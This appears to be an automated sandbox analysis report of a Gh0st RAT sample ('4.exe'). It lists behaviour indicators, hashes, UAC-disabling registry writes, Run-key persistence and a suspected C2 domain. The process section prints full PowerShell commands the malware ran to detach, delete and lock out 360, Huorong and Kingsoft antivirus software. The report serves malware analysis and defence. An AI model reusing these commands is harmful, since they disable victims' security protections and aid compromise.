File name:

4.exe

Full analysis: https://app.any.run/tasks/8b7096c9-49e4-42fe-b6e9-6ff8d1972560
Verdict: Malicious activity
Threats:

Gh0st RAT is a malware with advanced trojan functionality that enables attackers to establish full control over the victim’s system. The spying capabilities of Gh0st RAT made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common vector of attack involving this malware begins with spam and phishing emails.

Malware Trends Tracker     >>>
Analysis date: December 19, 2024, 08:27:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
rat
gh0st
lua
upx
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

3FADBB51B25E6CDBE5602A60479D0B0E

SHA1:

FBB4FF7160BC99FA88339707E2F2F66B459A3538

SHA256:

B3762AFC2A606B2DEC3FA18C9F1E58F7065F2437DDE720176C6608E09E9A767D

SSDEEP:

98304:5DrpK4L00MTSMVr0Xb002l0M2s6jRzvy7KV3rt8nOBl6M8Q/kh5ANftsXJnJnuyF:WJD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 4.exe (PID: 6544)
      • 4.exe (PID: 6636)

    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 6796)

    • GH0ST has been detected (SURICATA)

      • iusb3mon.exe (PID: 6796)

    • Connects to the CnC server

      • iusb3mon.exe (PID: 6796)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7360)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)

    • Changes powershell execution policy (Bypass)

      • iusb3mon.exe (PID: 6796)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 6152)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 4.exe (PID: 6636)
      • ShellExperienceHost.exe (PID: 4244)

    • Executable content was dropped or overwritten

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)

    • Reads the date of Windows installation

      • 4.exe (PID: 6636)

    • Removes files via Powershell

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 6956)
      • powershell.exe (PID: 6964)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)

    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)
      • powershell.exe (PID: 7740)

    • Manipulates environment variables

      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 6956)
      • powershell.exe (PID: 6964)

    • Starts POWERSHELL.EXE for commands execution

      • iusb3mon.exe (PID: 6796)
      • irsetup.exe (PID: 6684)

    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 6796)

    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 6796)

    • Creates file in the systems drive root

      • iusb3mon.exe (PID: 6796)
      • cmd.exe (PID: 7160)

    • Contacting a server suspected of hosting an CnC

      • iusb3mon.exe (PID: 6796)

    • Suspicious use of asymmetric encryption in PowerShell

      • iusb3mon.exe (PID: 6796)
      • irsetup.exe (PID: 6684)

    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 6796)

    • Renames file via Powershell

      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)
      • powershell.exe (PID: 6820)

    • Connects to unusual port

      • iusb3mon.exe (PID: 6796)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6964)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6964)

    • Probably obfuscated PowerShell command line is found

      • irsetup.exe (PID: 6684)

  • INFO

    • The sample compiled with english language support

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)

    • Reads the computer name

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
      • ShellExperienceHost.exe (PID: 4244)
      • iusb3mon.exe (PID: 6796)

    • Checks supported languages

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
      • ShellExperienceHost.exe (PID: 4244)
      • iusb3mon.exe (PID: 6796)

    • Create files in a temporary directory

      • 4.exe (PID: 6636)
      • SecEdit.exe (PID: 7996)

    • Reads the machine GUID from the registry

      • iusb3mon.exe (PID: 6796)

    • Reads CPU info

      • iusb3mon.exe (PID: 6796)

    • Sends debugging messages

      • iusb3mon.exe (PID: 6796)

    • Creates files in the program directory

      • iusb3mon.exe (PID: 6796)

    • The process uses the downloaded file

      • irsetup.exe (PID: 6684)

    • Process checks computer location settings

      • irsetup.exe (PID: 6684)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)

    • The process uses Lua

      • irsetup.exe (PID: 6684)

    • UPX packer has been detected

      • iusb3mon.exe (PID: 6796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.scr | Windows screen saver (76.6)
.exe | Generic Win/DOS Executable (11.7)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 139264
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 9.1.0.0
ProductVersionNumber: 9.1.0.0
FileFlagsMask: 0x003f
FileFlags: Private build
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: Created with Setup Factory
FileDescription: Setup Application
FileVersion: 9.1.0.0
InternalName: suf_launch
LegalCopyright: Setup Engine Copyright © 2004-2012 Indigo Rose Corporation
LegalTrademarks: Setup Factory is a trademark of Indigo Rose Corporation.
OriginalFileName: suf_launch.exe
ProductName: Setup Factory Runtime
ProductVersion: 9.1.0.0
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
178
Monitored processes
48
Malicious processes
9
Suspicious processes
7

Behavior graph

Click at the process to see the details
start 4.exe irsetup.exe #GH0ST iusb3mon.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs shellexperiencehost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs secedit.exe no specs secedit.exe no specs secedit.exe no specs secedit.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs 4.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
640powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
640\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1156\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1488powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1904\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2148\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3060\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3140\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3532powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
4076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeirsetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
64 488
Read events
64 474
Write events
10
Delete events
4

Modification events

(PID) Process:(6684) irsetup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(4244) ShellExperienceHost.exeKey:\REGISTRY\A\{97ac789c-5a54-b28d-432c-5c87ef853933}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D00000087783AF5EF51DB01
(PID) Process:(4244) ShellExperienceHost.exeKey:\REGISTRY\A\{97ac789c-5a54-b28d-432c-5c87ef853933}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D0000006B203CF5EF51DB01
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6796) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(6796) iusb3mon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Microsoft
Value:
C:\ProgramData\Program\iusb3mon.exe
(PID) Process:(7996) SecEdit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation:delete valueName:LastWinlogonConfig
Value:
Executable files
3
Suspicious files
10
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
6684irsetup.exeC:\ProgramData\Program\iusb3mon.exeexecutable
MD5:E79F996B69D7FA546ED9235FDC0EE06D
SHA256:EC7FCD3F4533D3514A9A42CBC41C40358EEA47255BAB1171146A5CCEBAF20990
6684irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPGimage
MD5:3220A6AEFB4FC719CC8849F060859169
SHA256:988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
6684irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.datbinary
MD5:0C87361D5B609B0D56730DD142EDDFD9
SHA256:D7A04FB3D8FFCDFE6E229436422BF2B1CDDFB8FC78A0345E5C324A9FF1AE5D78
6684irsetup.exeC:\ProgramData\Program\iusb3mon.datcompressed
MD5:7DB8E66EF74C2BA301C9DE02A08AAB79
SHA256:9897994028E66EBA4C5691FE6AB4D9DF527580C8A48F42066E51A82BB6AE2EE9
6684irsetup.exeC:\ProgramData\templateWatch.datbinary
MD5:02AD2CD3401BA2B6535CA8C4C59CDCA8
SHA256:C05212A3B64061A29F774C854F53FE91F13DA53728BE15ACB14AEB56CBA715DE
6796iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\_TUProjDT.dattext
MD5:67BF1F80834081FC794C6ED1F7C2FED5
SHA256:54FD2361602E82DB016D6EA62FBADC3984B566399DFAAC7E0A1181E4C70B90C2
6796iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG1.JPGimage
MD5:E39405E85E09F64CCDE0F59392317DD3
SHA256:CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F
6820powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ljk5p5p.bum.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6820powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:D6242D5F2FD5B3B1EB9D718A6B7C3F2F
SHA256:CD7492D68829ECEA5C81A9FC3D2CE16EACA9C3D20C57E48FA2C77A180F716164
6796iusb3mon.exeC:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPGimage
MD5:E39405E85E09F64CCDE0F59392317DD3
SHA256:CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
34
DNS requests
17
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5236
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6352
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5236
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6352
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
192.168.100.255:137
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2380
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1076
svchost.exe
23.218.210.69:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.110
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
login.live.com
  • 20.190.159.75
  • 40.126.31.67
  • 20.190.159.0
  • 20.190.159.4
  • 40.126.31.73
  • 20.190.159.71
  • 40.126.31.69
  • 20.190.159.73
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
k6.laomaogege.com
  • 134.122.183.243
unknown
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
Process
Message
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...
iusb3mon.exe
Thread running...